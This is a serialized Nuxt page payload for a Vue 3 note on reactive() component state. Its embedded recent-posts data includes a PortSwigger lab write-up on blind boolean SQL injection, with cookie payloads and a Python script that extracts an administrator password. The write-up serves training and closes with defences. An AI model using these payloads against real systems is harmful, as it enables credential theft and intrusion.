[{"data":1,"prerenderedAt":1616},["ShallowReactive",2],{"page-en-\u002Fnotes\u002Ffrontend\u002Fcreate-component-state-like-options-api-using-reactive":3,"recent-en":346,"posts-en-frontend":1356},{"id":4,"title":5,"author":6,"body":7,"date":333,"description":334,"extension":335,"image":336,"meta":337,"navigation":85,"path":338,"seo":339,"sitemap":340,"stem":341,"tags":342,"__hash__":345},"content_en\u002Fnotes\u002Ffrontend\u002Fcreate-component-state-like-options-api-using-reactive.md","Creating component state like Options API using reactive()","Oleg Anuchin",{"type":8,"value":9,"toc":331},"minimark",[10,14,27,38,327],[11,12,5],"h1",{"id":13},"creating-component-state-like-options-api-using-reactive",[15,16,17,18,22,23,26],"p",{},"In Options API we can use ",[19,20,21],"code",{},"data()"," function to create a state for the component, then access it directly via ",[19,24,25],{},"this",".",[15,28,29,30,33,34,37],{},"Using ",[19,31,32],{},"reactive()"," from Composition API achieves the same pattern — much easier than using ",[19,35,36],{},"ref()"," for multiple state properties.",[39,40,45],"pre",{"className":41,"code":42,"language":43,"meta":44,"style":44},"language-vue shiki shiki-themes github-light github-dark","\u003Cscript>\nimport { computed, reactive, toRefs } from 'vue'\n\nexport default {\n  setup() {\n    const state = reactive({\n      price: 2,\n      quantity: 5\n    })\n\n    const total = computed(() => {\n      return state.price * state.quantity\n    })\n\n    return {\n      ...toRefs(state),\n      total\n    }\n  }\n}\n\u003C\u002Fscript>\n\n\u003Ctemplate>\n  \u003Cp>Price: {{ price }}\u003C\u002Fp>\n  \u003Cp>Quantity: {{ quantity }}\u003C\u002Fp>\n  \u003Cp>Total: {{ total }}\u003C\u002Fp>\n\u003C\u002Ftemplate>\n","vue","",[19,46,47,63,80,87,99,109,128,140,149,155,160,181,196,201,206,214,226,232,238,244,250,260,265,275,290,304,318],{"__ignoreMap":44},[48,49,52,56,60],"span",{"class":50,"line":51},"line",1,[48,53,55],{"class":54},"sVt8B","\u003C",[48,57,59],{"class":58},"s9eBZ","script",[48,61,62],{"class":54},">\n",[48,64,66,70,73,76],{"class":50,"line":65},2,[48,67,69],{"class":68},"szBVR","import",[48,71,72],{"class":54}," { computed, reactive, toRefs } ",[48,74,75],{"class":68},"from",[48,77,79],{"class":78},"sZZnC"," 'vue'\n",[48,81,83],{"class":50,"line":82},3,[48,84,86],{"emptyLinePlaceholder":85},true,"\n",[48,88,90,93,96],{"class":50,"line":89},4,[48,91,92],{"class":68},"export",[48,94,95],{"class":68}," default",[48,97,98],{"class":54}," {\n",[48,100,102,106],{"class":50,"line":101},5,[48,103,105],{"class":104},"sScJk","  setup",[48,107,108],{"class":54},"() {\n",[48,110,112,115,119,122,125],{"class":50,"line":111},6,[48,113,114],{"class":68},"    const",[48,116,118],{"class":117},"sj4cs"," state",[48,120,121],{"class":68}," =",[48,123,124],{"class":104}," reactive",[48,126,127],{"class":54},"({\n",[48,129,131,134,137],{"class":50,"line":130},7,[48,132,133],{"class":54},"      price: ",[48,135,136],{"class":117},"2",[48,138,139],{"class":54},",\n",[48,141,143,146],{"class":50,"line":142},8,[48,144,145],{"class":54},"      quantity: ",[48,147,148],{"class":117},"5\n",[48,150,152],{"class":50,"line":151},9,[48,153,154],{"class":54},"    })\n",[48,156,158],{"class":50,"line":157},10,[48,159,86],{"emptyLinePlaceholder":85},[48,161,163,165,168,170,173,176,179],{"class":50,"line":162},11,[48,164,114],{"class":68},[48,166,167],{"class":117}," total",[48,169,121],{"class":68},[48,171,172],{"class":104}," computed",[48,174,175],{"class":54},"(() ",[48,177,178],{"class":68},"=>",[48,180,98],{"class":54},[48,182,184,187,190,193],{"class":50,"line":183},12,[48,185,186],{"class":68},"      return",[48,188,189],{"class":54}," state.price ",[48,191,192],{"class":68},"*",[48,194,195],{"class":54}," state.quantity\n",[48,197,199],{"class":50,"line":198},13,[48,200,154],{"class":54},[48,202,204],{"class":50,"line":203},14,[48,205,86],{"emptyLinePlaceholder":85},[48,207,209,212],{"class":50,"line":208},15,[48,210,211],{"class":68},"    return",[48,213,98],{"class":54},[48,215,217,220,223],{"class":50,"line":216},16,[48,218,219],{"class":68},"      ...",[48,221,222],{"class":104},"toRefs",[48,224,225],{"class":54},"(state),\n",[48,227,229],{"class":50,"line":228},17,[48,230,231],{"class":54},"      total\n",[48,233,235],{"class":50,"line":234},18,[48,236,237],{"class":54},"    }\n",[48,239,241],{"class":50,"line":240},19,[48,242,243],{"class":54},"  }\n",[48,245,247],{"class":50,"line":246},20,[48,248,249],{"class":54},"}\n",[48,251,253,256,258],{"class":50,"line":252},21,[48,254,255],{"class":54},"\u003C\u002F",[48,257,59],{"class":58},[48,259,62],{"class":54},[48,261,263],{"class":50,"line":262},22,[48,264,86],{"emptyLinePlaceholder":85},[48,266,268,270,273],{"class":50,"line":267},23,[48,269,55],{"class":54},[48,271,272],{"class":58},"template",[48,274,62],{"class":54},[48,276,278,281,283,286,288],{"class":50,"line":277},24,[48,279,280],{"class":54},"  \u003C",[48,282,15],{"class":58},[48,284,285],{"class":54},">Price: {{ price }}\u003C\u002F",[48,287,15],{"class":58},[48,289,62],{"class":54},[48,291,293,295,297,300,302],{"class":50,"line":292},25,[48,294,280],{"class":54},[48,296,15],{"class":58},[48,298,299],{"class":54},">Quantity: {{ quantity }}\u003C\u002F",[48,301,15],{"class":58},[48,303,62],{"class":54},[48,305,307,309,311,314,316],{"class":50,"line":306},26,[48,308,280],{"class":54},[48,310,15],{"class":58},[48,312,313],{"class":54},">Total: {{ total }}\u003C\u002F",[48,315,15],{"class":58},[48,317,62],{"class":54},[48,319,321,323,325],{"class":50,"line":320},27,[48,322,255],{"class":54},[48,324,272],{"class":58},[48,326,62],{"class":54},[328,329,330],"style",{},"html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .s9eBZ, html code.shiki .s9eBZ{--shiki-default:#22863A;--shiki-dark:#85E89D}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":44,"searchDepth":65,"depth":65,"links":332},[],"2022-08-20","How to use reactive() in Vue 3 Composition API to create component state similar to Options API data()","md",null,{},"\u002Fnotes\u002Ffrontend\u002Fcreate-component-state-like-options-api-using-reactive",{"title":5,"description":334},{"loc":338},"notes\u002Ffrontend\u002Fcreate-component-state-like-options-api-using-reactive",[43,343,344],"composition-api","reactive","96O7U6Y83TlYNqqAf521cyGpqClhv0qB2l1dmJtT0pw",[347,950,1177,1228],{"id":348,"title":349,"author":350,"body":351,"date":937,"description":938,"extension":335,"image":336,"meta":939,"navigation":85,"path":940,"seo":941,"sitemap":942,"stem":943,"tags":944,"__hash__":949},"content_en\u002Fnotes\u002Fpentesting\u002Fportswigger-sqli-blind-conditional-responses.md","Blind SQL Injection with Conditional Responses (PortSwigger Lab)","apsyleg",{"type":8,"value":352,"toc":926},[353,357,362,369,388,392,418,422,429,432,440,447,450,481,484,488,493,500,509,519,523,529,544,547,551,558,877,883,894,898,901,906,923],[11,354,356],{"id":355},"blind-sql-injection-with-conditional-responses","Blind SQL Injection with Conditional Responses",[358,359,361],"h2",{"id":360},"vulnerability","Vulnerability",[15,363,364,368],{},[365,366,367],"strong",{},"Blind SQL injection"," is a class of SQL injection where the application does not return query results or error messages in the HTTP response. Instead, the attacker infers information by observing differences in application behavior — such as whether a particular message appears, or whether the response takes longer.",[15,370,371,372,375,376,379,380,383,384,387],{},"In this variant (",[365,373,374],{},"boolean-based blind SQLi","), the application returns different content depending on whether the injected condition evaluates to ",[19,377,378],{},"TRUE"," or ",[19,381,382],{},"FALSE",". By crafting conditions like ",[19,385,386],{},"SUBSTRING(password, 1, 1) = 'a'",", an attacker can extract data one character at a time.",[358,389,391],{"id":390},"lab","Lab",[15,393,394,397,398,405,408,411,412,414,417],{},[365,395,396],{},"Name:"," ",[399,400,404],"a",{"href":401,"rel":402},"https:\u002F\u002Fportswigger.net\u002Fweb-security\u002Fsql-injection\u002Fblind\u002Flab-conditional-responses",[403],"nofollow","Blind SQL injection with conditional responses",[406,407],"br",{},[365,409,410],{},"Difficulty:"," Practitioner",[406,413],{},[365,415,416],{},"Goal:"," Exploit a blind SQL injection vulnerability in a tracking cookie to extract the administrator's password and log in.",[358,419,421],{"id":420},"reconnaissance","Reconnaissance",[15,423,424,425,428],{},"The application stores a ",[19,426,427],{},"TrackingId"," cookie that is used in an SQL query. The query result is never displayed, but a \"Welcome back!\" message appears on the page when the query returns at least one row.",[15,430,431],{},"First, we confirm the injection point by appending a quote:",[39,433,438],{"className":434,"code":436,"language":437},[435],"language-text","TrackingId=ncJfdwqSUQK7Gh4b'--\n","text",[19,439,436],{"__ignoreMap":44},[15,441,442,443,446],{},"The \"Welcome back!\" message still appears — the comment ",[19,444,445],{},"--"," neutralizes the rest of the original query, so the injection is active.",[15,448,449],{},"Next, we verify boolean behavior:",[39,451,455],{"className":452,"code":453,"language":454,"meta":44,"style":44},"language-sql shiki shiki-themes github-light github-dark","-- TRUE condition → \"Welcome back!\" appears\nTrackingId=ncJfdwqSUQK7Gh4b' AND 1=1--\n\n-- FALSE condition → \"Welcome back!\" disappears\nTrackingId=ncJfdwqSUQK7Gh4b' AND 1=0--\n","sql",[19,456,457,462,467,471,476],{"__ignoreMap":44},[48,458,459],{"class":50,"line":51},[48,460,461],{},"-- TRUE condition → \"Welcome back!\" appears\n",[48,463,464],{"class":50,"line":65},[48,465,466],{},"TrackingId=ncJfdwqSUQK7Gh4b' AND 1=1--\n",[48,468,469],{"class":50,"line":82},[48,470,86],{"emptyLinePlaceholder":85},[48,472,473],{"class":50,"line":89},[48,474,475],{},"-- FALSE condition → \"Welcome back!\" disappears\n",[48,477,478],{"class":50,"line":101},[48,479,480],{},"TrackingId=ncJfdwqSUQK7Gh4b' AND 1=0--\n",[15,482,483],{},"We now have a reliable oracle: if the injected condition is true, the message appears; if false, it does not. This is enough to extract any data from the database bit by bit.",[358,485,487],{"id":486},"exploitation","Exploitation",[489,490,492],"h3",{"id":491},"step-1-determine-password-length","Step 1 — Determine password length",[15,494,495,496,499],{},"We use ",[19,497,498],{},"LENGTH()"," to find how many characters the administrator's password has:",[39,501,503],{"className":452,"code":502,"language":454,"meta":44,"style":44},"TrackingId=...'+AND+LENGTH((SELECT+password+FROM+users+WHERE+username='administrator'))=20--\n",[19,504,505],{"__ignoreMap":44},[48,506,507],{"class":50,"line":51},[48,508,502],{},[15,510,511,512,515,516,26],{},"\"Welcome back!\" appears at ",[19,513,514],{},"= 20"," — the password is ",[365,517,518],{},"20 characters long",[489,520,522],{"id":521},"step-2-extract-characters","Step 2 — Extract characters",[15,524,495,525,528],{},[19,526,527],{},"SUBSTRING(string, position, length)"," to test one character at a time:",[39,530,532],{"className":452,"code":531,"language":454,"meta":44,"style":44},"-- Is the 1st character 'w'?\nTrackingId=...'+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username='administrator'),1,1)='w'--\n",[19,533,534,539],{"__ignoreMap":44},[48,535,536],{"class":50,"line":51},[48,537,538],{},"-- Is the 1st character 'w'?\n",[48,540,541],{"class":50,"line":65},[48,542,543],{},"TrackingId=...'+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username='administrator'),1,1)='w'--\n",[15,545,546],{},"Doing this manually for 20 characters × 36 possible values (a–z + 0–9) would take hundreds of requests. We automate it with a Python script.",[489,548,550],{"id":549},"step-3-automate-with-python","Step 3 — Automate with Python",[15,552,553,554,557],{},"The script uses ",[19,555,556],{},"ThreadPoolExecutor"," to run 10 requests in parallel, dramatically reducing extraction time:",[39,559,563],{"className":560,"code":561,"language":562,"meta":44,"style":44},"language-python shiki shiki-themes github-light github-dark","import requests\nimport string\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\nHOST = \"0a7100260337b44880b2629c0027006c.web-security-academy.net\"\nBASE_URL = f\"https:\u002F\u002F{HOST}\u002Ffilter?category=Gifts\"\nTRACKING_ID = \"ncJfdwqSUQK7Gh4b\"\nSESSION = \"mtuIxpMFzxZA2eGtxMv2idcobVsAqTtk\"\n\nCHARSET = string.ascii_lowercase + string.digits\nMAX_LENGTH = 30\nTHREADS = 10\n\n\ndef check(sql_condition: str) -> bool:\n    payload = f\"{TRACKING_ID}'+AND+{sql_condition}--\"\n    cookies = {\"TrackingId\": payload, \"session\": SESSION}\n    r = requests.get(BASE_URL, cookies=cookies, timeout=10)\n    return \"Welcome back\" in r.text\n\n\ndef get_password_length(max_len: int = MAX_LENGTH) -> int:\n    print(\"[*] Determining password length...\")\n    for n in range(1, max_len + 1):\n        condition = f\"LENGTH((SELECT+password+FROM+users+WHERE+username='administrator'))={n}\"\n        if check(condition):\n            print(f\"[+] Password length: {n}\")\n            return n\n    raise ValueError(f\"Password length not found within {max_len}\")\n\n\ndef get_char_at(pos: int, length: int) -> tuple[int, str]:\n    for c in CHARSET:\n        condition = f\"SUBSTRING((SELECT+password+FROM+users+WHERE+username='administrator'),{pos},1)='{c}'\"\n        if check(condition):\n            return pos, c\n    return pos, \"?\"\n\n\ndef get_password(length: int) -> str:\n    print(f\"[*] Brute-forcing {length} characters with {THREADS} threads...\")\n    password = [\"?\"] * length\n    with ThreadPoolExecutor(max_workers=THREADS) as executor:\n        futures = {executor.submit(get_char_at, pos, length): pos for pos in range(1, length + 1)}\n        for future in as_completed(futures):\n            pos, char = future.result()\n            password[pos - 1] = char\n            print(f\"  [{pos}\u002F{length}] '{char}' => {''.join(password)}\")\n    return \"\".join(password)\n\n\ndef main():\n    length = get_password_length()\n    password = get_password(length)\n    print(f\"\\n[+] Password: {password}\")\n\n\nif __name__ == \"__main__\":\n    main()\n","python",[19,564,565,570,575,580,584,589,594,599,604,608,613,618,623,627,631,636,641,646,651,656,660,664,669,674,679,684,689,694,700,706,711,716,722,728,734,739,745,751,756,761,767,773,779,785,791,797,803,809,815,821,826,831,837,843,849,855,860,865,871],{"__ignoreMap":44},[48,566,567],{"class":50,"line":51},[48,568,569],{},"import requests\n",[48,571,572],{"class":50,"line":65},[48,573,574],{},"import string\n",[48,576,577],{"class":50,"line":82},[48,578,579],{},"from concurrent.futures import ThreadPoolExecutor, as_completed\n",[48,581,582],{"class":50,"line":89},[48,583,86],{"emptyLinePlaceholder":85},[48,585,586],{"class":50,"line":101},[48,587,588],{},"HOST = \"0a7100260337b44880b2629c0027006c.web-security-academy.net\"\n",[48,590,591],{"class":50,"line":111},[48,592,593],{},"BASE_URL = f\"https:\u002F\u002F{HOST}\u002Ffilter?category=Gifts\"\n",[48,595,596],{"class":50,"line":130},[48,597,598],{},"TRACKING_ID = \"ncJfdwqSUQK7Gh4b\"\n",[48,600,601],{"class":50,"line":142},[48,602,603],{},"SESSION = \"mtuIxpMFzxZA2eGtxMv2idcobVsAqTtk\"\n",[48,605,606],{"class":50,"line":151},[48,607,86],{"emptyLinePlaceholder":85},[48,609,610],{"class":50,"line":157},[48,611,612],{},"CHARSET = string.ascii_lowercase + string.digits\n",[48,614,615],{"class":50,"line":162},[48,616,617],{},"MAX_LENGTH = 30\n",[48,619,620],{"class":50,"line":183},[48,621,622],{},"THREADS = 10\n",[48,624,625],{"class":50,"line":198},[48,626,86],{"emptyLinePlaceholder":85},[48,628,629],{"class":50,"line":203},[48,630,86],{"emptyLinePlaceholder":85},[48,632,633],{"class":50,"line":208},[48,634,635],{},"def check(sql_condition: str) -> bool:\n",[48,637,638],{"class":50,"line":216},[48,639,640],{},"    payload = f\"{TRACKING_ID}'+AND+{sql_condition}--\"\n",[48,642,643],{"class":50,"line":228},[48,644,645],{},"    cookies = {\"TrackingId\": payload, \"session\": SESSION}\n",[48,647,648],{"class":50,"line":234},[48,649,650],{},"    r = requests.get(BASE_URL, cookies=cookies, timeout=10)\n",[48,652,653],{"class":50,"line":240},[48,654,655],{},"    return \"Welcome back\" in r.text\n",[48,657,658],{"class":50,"line":246},[48,659,86],{"emptyLinePlaceholder":85},[48,661,662],{"class":50,"line":252},[48,663,86],{"emptyLinePlaceholder":85},[48,665,666],{"class":50,"line":262},[48,667,668],{},"def get_password_length(max_len: int = MAX_LENGTH) -> int:\n",[48,670,671],{"class":50,"line":267},[48,672,673],{},"    print(\"[*] Determining password length...\")\n",[48,675,676],{"class":50,"line":277},[48,677,678],{},"    for n in range(1, max_len + 1):\n",[48,680,681],{"class":50,"line":292},[48,682,683],{},"        condition = f\"LENGTH((SELECT+password+FROM+users+WHERE+username='administrator'))={n}\"\n",[48,685,686],{"class":50,"line":306},[48,687,688],{},"        if check(condition):\n",[48,690,691],{"class":50,"line":320},[48,692,693],{},"            print(f\"[+] Password length: {n}\")\n",[48,695,697],{"class":50,"line":696},28,[48,698,699],{},"            return n\n",[48,701,703],{"class":50,"line":702},29,[48,704,705],{},"    raise ValueError(f\"Password length not found within {max_len}\")\n",[48,707,709],{"class":50,"line":708},30,[48,710,86],{"emptyLinePlaceholder":85},[48,712,714],{"class":50,"line":713},31,[48,715,86],{"emptyLinePlaceholder":85},[48,717,719],{"class":50,"line":718},32,[48,720,721],{},"def get_char_at(pos: int, length: int) -> tuple[int, str]:\n",[48,723,725],{"class":50,"line":724},33,[48,726,727],{},"    for c in CHARSET:\n",[48,729,731],{"class":50,"line":730},34,[48,732,733],{},"        condition = f\"SUBSTRING((SELECT+password+FROM+users+WHERE+username='administrator'),{pos},1)='{c}'\"\n",[48,735,737],{"class":50,"line":736},35,[48,738,688],{},[48,740,742],{"class":50,"line":741},36,[48,743,744],{},"            return pos, c\n",[48,746,748],{"class":50,"line":747},37,[48,749,750],{},"    return pos, \"?\"\n",[48,752,754],{"class":50,"line":753},38,[48,755,86],{"emptyLinePlaceholder":85},[48,757,759],{"class":50,"line":758},39,[48,760,86],{"emptyLinePlaceholder":85},[48,762,764],{"class":50,"line":763},40,[48,765,766],{},"def get_password(length: int) -> str:\n",[48,768,770],{"class":50,"line":769},41,[48,771,772],{},"    print(f\"[*] Brute-forcing {length} characters with {THREADS} threads...\")\n",[48,774,776],{"class":50,"line":775},42,[48,777,778],{},"    password = [\"?\"] * length\n",[48,780,782],{"class":50,"line":781},43,[48,783,784],{},"    with ThreadPoolExecutor(max_workers=THREADS) as executor:\n",[48,786,788],{"class":50,"line":787},44,[48,789,790],{},"        futures = {executor.submit(get_char_at, pos, length): pos for pos in range(1, length + 1)}\n",[48,792,794],{"class":50,"line":793},45,[48,795,796],{},"        for future in as_completed(futures):\n",[48,798,800],{"class":50,"line":799},46,[48,801,802],{},"            pos, char = future.result()\n",[48,804,806],{"class":50,"line":805},47,[48,807,808],{},"            password[pos - 1] = char\n",[48,810,812],{"class":50,"line":811},48,[48,813,814],{},"            print(f\"  [{pos}\u002F{length}] '{char}' => {''.join(password)}\")\n",[48,816,818],{"class":50,"line":817},49,[48,819,820],{},"    return \"\".join(password)\n",[48,822,824],{"class":50,"line":823},50,[48,825,86],{"emptyLinePlaceholder":85},[48,827,829],{"class":50,"line":828},51,[48,830,86],{"emptyLinePlaceholder":85},[48,832,834],{"class":50,"line":833},52,[48,835,836],{},"def main():\n",[48,838,840],{"class":50,"line":839},53,[48,841,842],{},"    length = get_password_length()\n",[48,844,846],{"class":50,"line":845},54,[48,847,848],{},"    password = get_password(length)\n",[48,850,852],{"class":50,"line":851},55,[48,853,854],{},"    print(f\"\\n[+] Password: {password}\")\n",[48,856,858],{"class":50,"line":857},56,[48,859,86],{"emptyLinePlaceholder":85},[48,861,863],{"class":50,"line":862},57,[48,864,86],{"emptyLinePlaceholder":85},[48,866,868],{"class":50,"line":867},58,[48,869,870],{},"if __name__ == \"__main__\":\n",[48,872,874],{"class":50,"line":873},59,[48,875,876],{},"    main()\n",[15,878,879,880],{},"Result: ",[19,881,882],{},"wfa3n32o7a6mb4xon7d6",[15,884,885,886,889,890,893],{},"Log in to ",[19,887,888],{},"\u002Fmy-account"," as ",[19,891,892],{},"administrator"," with this password — lab solved.",[358,895,897],{"id":896},"conclusion","Conclusion",[15,899,900],{},"Blind SQL injection is more subtle than classic SQLi but equally dangerous. Even without any output, a single boolean signal (message present \u002F absent) is enough to extract the entire database.",[15,902,903],{},[365,904,905],{},"How to defend:",[907,908,909,913,916],"ul",{},[910,911,912],"li",{},"Use parameterized queries (prepared statements) — they eliminate injection entirely",[910,914,915],{},"Never concatenate user input directly into SQL strings",[910,917,918,919,922],{},"Apply least privilege to database accounts — the web app user should not have access to the ",[19,920,921],{},"users"," table",[328,924,925],{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":44,"searchDepth":65,"depth":65,"links":927},[928,929,930,931,936],{"id":360,"depth":65,"text":361},{"id":390,"depth":65,"text":391},{"id":420,"depth":65,"text":421},{"id":486,"depth":65,"text":487,"children":932},[933,934,935],{"id":491,"depth":82,"text":492},{"id":521,"depth":82,"text":522},{"id":549,"depth":82,"text":550},{"id":896,"depth":65,"text":897},"2026-03-28","How to exploit blind SQL injection via a tracking cookie using boolean-based inference and a multithreaded Python script.",{},"\u002Fnotes\u002Fpentesting\u002Fportswigger-sqli-blind-conditional-responses",{"title":349,"description":938},{"loc":940},"notes\u002Fpentesting\u002Fportswigger-sqli-blind-conditional-responses",[945,946,947,948],"portswigger","sql-injection","blind-sqli","web-security","xjqLMT0ON2Iphb3NwOgTkgmjGcHATsLRPcyMBeD0IF4",{"id":4,"title":5,"author":6,"body":951,"date":333,"description":334,"extension":335,"image":336,"meta":1173,"navigation":85,"path":338,"seo":1174,"sitemap":1175,"stem":341,"tags":1176,"__hash__":345},{"type":8,"value":952,"toc":1171},[953,955,961,967,1169],[11,954,5],{"id":13},[15,956,17,957,22,959,26],{},[19,958,21],{},[19,960,25],{},[15,962,29,963,33,965,37],{},[19,964,32],{},[19,966,36],{},[39,968,969],{"className":41,"code":42,"language":43,"meta":44,"style":44},[19,970,971,979,989,993,1001,1007,1019,1027,1033,1037,1041,1057,1067,1071,1075,1081,1089,1093,1097,1101,1105,1113,1117,1125,1137,1149,1161],{"__ignoreMap":44},[48,972,973,975,977],{"class":50,"line":51},[48,974,55],{"class":54},[48,976,59],{"class":58},[48,978,62],{"class":54},[48,980,981,983,985,987],{"class":50,"line":65},[48,982,69],{"class":68},[48,984,72],{"class":54},[48,986,75],{"class":68},[48,988,79],{"class":78},[48,990,991],{"class":50,"line":82},[48,992,86],{"emptyLinePlaceholder":85},[48,994,995,997,999],{"class":50,"line":89},[48,996,92],{"class":68},[48,998,95],{"class":68},[48,1000,98],{"class":54},[48,1002,1003,1005],{"class":50,"line":101},[48,1004,105],{"class":104},[48,1006,108],{"class":54},[48,1008,1009,1011,1013,1015,1017],{"class":50,"line":111},[48,1010,114],{"class":68},[48,1012,118],{"class":117},[48,1014,121],{"class":68},[48,1016,124],{"class":104},[48,1018,127],{"class":54},[48,1020,1021,1023,1025],{"class":50,"line":130},[48,1022,133],{"class":54},[48,1024,136],{"class":117},[48,1026,139],{"class":54},[48,1028,1029,1031],{"class":50,"line":142},[48,1030,145],{"class":54},[48,1032,148],{"class":117},[48,1034,1035],{"class":50,"line":151},[48,1036,154],{"class":54},[48,1038,1039],{"class":50,"line":157},[48,1040,86],{"emptyLinePlaceholder":85},[48,1042,1043,1045,1047,1049,1051,1053,1055],{"class":50,"line":162},[48,1044,114],{"class":68},[48,1046,167],{"class":117},[48,1048,121],{"class":68},[48,1050,172],{"class":104},[48,1052,175],{"class":54},[48,1054,178],{"class":68},[48,1056,98],{"class":54},[48,1058,1059,1061,1063,1065],{"class":50,"line":183},[48,1060,186],{"class":68},[48,1062,189],{"class":54},[48,1064,192],{"class":68},[48,1066,195],{"class":54},[48,1068,1069],{"class":50,"line":198},[48,1070,154],{"class":54},[48,1072,1073],{"class":50,"line":203},[48,1074,86],{"emptyLinePlaceholder":85},[48,1076,1077,1079],{"class":50,"line":208},[48,1078,211],{"class":68},[48,1080,98],{"class":54},[48,1082,1083,1085,1087],{"class":50,"line":216},[48,1084,219],{"class":68},[48,1086,222],{"class":104},[48,1088,225],{"class":54},[48,1090,1091],{"class":50,"line":228},[48,1092,231],{"class":54},[48,1094,1095],{"class":50,"line":234},[48,1096,237],{"class":54},[48,1098,1099],{"class":50,"line":240},[48,1100,243],{"class":54},[48,1102,1103],{"class":50,"line":246},[48,1104,249],{"class":54},[48,1106,1107,1109,1111],{"class":50,"line":252},[48,1108,255],{"class":54},[48,1110,59],{"class":58},[48,1112,62],{"class":54},[48,1114,1115],{"class":50,"line":262},[48,1116,86],{"emptyLinePlaceholder":85},[48,1118,1119,1121,1123],{"class":50,"line":267},[48,1120,55],{"class":54},[48,1122,272],{"class":58},[48,1124,62],{"class":54},[48,1126,1127,1129,1131,1133,1135],{"class":50,"line":277},[48,1128,280],{"class":54},[48,1130,15],{"class":58},[48,1132,285],{"class":54},[48,1134,15],{"class":58},[48,1136,62],{"class":54},[48,1138,1139,1141,1143,1145,1147],{"class":50,"line":292},[48,1140,280],{"class":54},[48,1142,15],{"class":58},[48,1144,299],{"class":54},[48,1146,15],{"class":58},[48,1148,62],{"class":54},[48,1150,1151,1153,1155,1157,1159],{"class":50,"line":306},[48,1152,280],{"class":54},[48,1154,15],{"class":58},[48,1156,313],{"class":54},[48,1158,15],{"class":58},[48,1160,62],{"class":54},[48,1162,1163,1165,1167],{"class":50,"line":320},[48,1164,255],{"class":54},[48,1166,272],{"class":58},[48,1168,62],{"class":54},[328,1170,330],{},{"title":44,"searchDepth":65,"depth":65,"links":1172},[],{},{"title":5,"description":334},{"loc":338},[43,343,344],{"id":1178,"title":1179,"author":6,"body":1180,"date":1217,"description":1218,"extension":335,"image":336,"meta":1219,"navigation":85,"path":1220,"seo":1221,"sitemap":1222,"stem":1223,"tags":1224,"__hash__":1227},"content_en\u002Fnotes\u002Ffrontend\u002Fhow-to-upgrade-nuxt-3.md","How to upgrade Nuxt 3 project",{"type":8,"value":1181,"toc":1215},[1182,1185,1203,1206,1212],[11,1183,1179],{"id":1184},"how-to-upgrade-nuxt-3-project",[39,1186,1190],{"className":1187,"code":1188,"language":1189,"meta":44,"style":44},"language-bash shiki shiki-themes github-light github-dark","yarn nuxi upgrade\n","bash",[19,1191,1192],{"__ignoreMap":44},[48,1193,1194,1197,1200],{"class":50,"line":51},[48,1195,1196],{"class":104},"yarn",[48,1198,1199],{"class":78}," nuxi",[48,1201,1202],{"class":78}," upgrade\n",[15,1204,1205],{},"Example output:",[39,1207,1210],{"className":1208,"code":1209,"language":437},[435],"✔ Successfully upgraded nuxt from 3.0.0-rc.4-27605536.8c2c80e to 3.0.0-rc.4\n",[19,1211,1209],{"__ignoreMap":44},[328,1213,1214],{},"html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":44,"searchDepth":65,"depth":65,"links":1216},[],"2022-08-15","Simple command to upgrade Nuxt 3 to the latest 